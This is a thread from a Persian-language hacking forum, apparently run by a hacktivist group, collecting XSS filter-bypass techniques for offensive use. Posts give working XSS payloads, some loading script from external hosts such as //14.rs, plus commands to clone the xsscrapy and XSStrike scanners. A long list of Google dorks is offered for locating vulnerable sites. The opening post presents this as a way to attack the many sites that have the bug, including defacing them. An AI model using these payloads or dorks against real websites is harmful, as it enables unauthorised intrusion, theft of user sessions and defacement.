eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
|
|
| سه شنبه 24 مهر 1397 - 03:16 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
|
| سه شنبه 24 مهر 1397 - 03:22 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
|
| سه شنبه 24 مهر 1397 - 03:23 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
|
| سه شنبه 24 مهر 1397 - 03:25 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
پاسخ : 7 RE انواع بایپس های باگ XSS
کد:
Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
|
|
| سه شنبه 24 مهر 1397 - 05:01 |
|
eblisshar
ارسالها : 411
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 433
تشکر شده : 1988
|
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss
git clone https://github.com/DanMcInerney/xsscrapy.git
cd xsscrapy
./xsscrapy.py -u http://example.com
امضای کاربر : در حکم یک نعره لب دوختن ..
وبسایت سازمان اشرار : AshRaR.Info
چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8
|
|
| سه شنبه 24 مهر 1397 - 05:04 |
|
blackwolf_iran
ارسالها : 52
عضویت: 19 /7 /1397
تشکرها : 312
تشکر شده : 271
|
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی
این هم یک لیست خوب از پیلود های این باگ
امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
|
|
| سه شنبه 24 مهر 1397 - 05:10 |
|
blackwolf_iran
ارسالها : 52
عضویت: 19 /7 /1397
تشکرها : 312
تشکر شده : 271
|
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر
کد:
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>
امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
|
|
| سه شنبه 24 مهر 1397 - 05:11 |
|
darkshadow
ارسالها : 172
عضویت: 8 /6 /1397
محل زندگی: California LA
تشکرها : 400
تشکر شده : 641
|
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت
کد:
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:/pages/match_report.php?mid= pages/match_report.php?mid=
امضای کاربر :
کتگوری های انجمن
اخرین تاپیک های انجمن
کتگوری هکینگ
دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند.
شاهین نجفی
|
|
| سه شنبه 24 مهر 1397 - 08:11 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
|
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...
|
|
| یکشنبه 06 آبان 1397 - 05:00 |
|
virus32
ارسالها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
|
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss
دانلود :
|
|
| یکشنبه 06 آبان 1397 - 05:37 |
|
demon
ارسالها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
|
|
| پنجشنبه 01 آذر 1397 - 20:10 |
|
demon
ارسالها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
|
|
| دوشنبه 22 مهر 1398 - 02:52 |
|
demon
ارسالها : 76
عضویت: 17 /2 /1397
سن: 22
تشکرها : 362
تشکر شده : 358
|
پاسخ : 16 RE هک سایت باگ xss
ابزار XSStrike انواع حملات باگ xss
Suggest a feature
Report a bug
Fix something and open a pull request
Create a browser extension
Create a burp suite/zaproxy plugin
Help me document the code
Spread the word
git clone https://github.com/s0md3v/XSStrike.git
امضای کاربر : اشرار پایدار
Ali Mrd
Twitter : twitter.com/Mokh4lef
AshRaR.Info
shahinnajafi.ashrar.info
|
|
| دوشنبه 22 مهر 1398 - 02:56 |
|
